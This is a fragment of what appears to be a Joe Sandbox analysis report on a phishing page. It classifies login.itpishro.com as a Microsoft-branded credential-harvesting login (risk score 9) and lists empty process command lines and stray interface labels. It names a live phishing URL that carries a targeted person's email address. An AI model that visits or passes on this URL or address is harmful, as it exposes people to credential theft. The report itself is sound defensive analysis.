| URL: https://login.itpishro.com/?login_hint=lindsey.johnson@yogiproducts.com&sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'login.itpishro.com' does not match the legitimate domain for Microsoft.", "The domain 'itpishro.com' does not have any known association with Microsoft.", "The presence of a login page on a domain not associated with Microsoft is suspicious.", "The email domain 'yogiproducts.com' does not match the brand 'Microsoft', which could indicate a phishing attempt targeting users of Microsoft services." ], "riskscore": 9}
Google indexed: False |
URL: login.itpishro.com
Brands: Microsoft
Input Fields: lindsey.johnson@yogiproducts.com |
| URL: https://itpishro.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://itpishro.com |
Edit tour
OUTLOOK.EXE (PID: 7004 cmdline: 
ai.exe (PID: 6172 cmdline: 
chrome.exe (PID: 6860 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node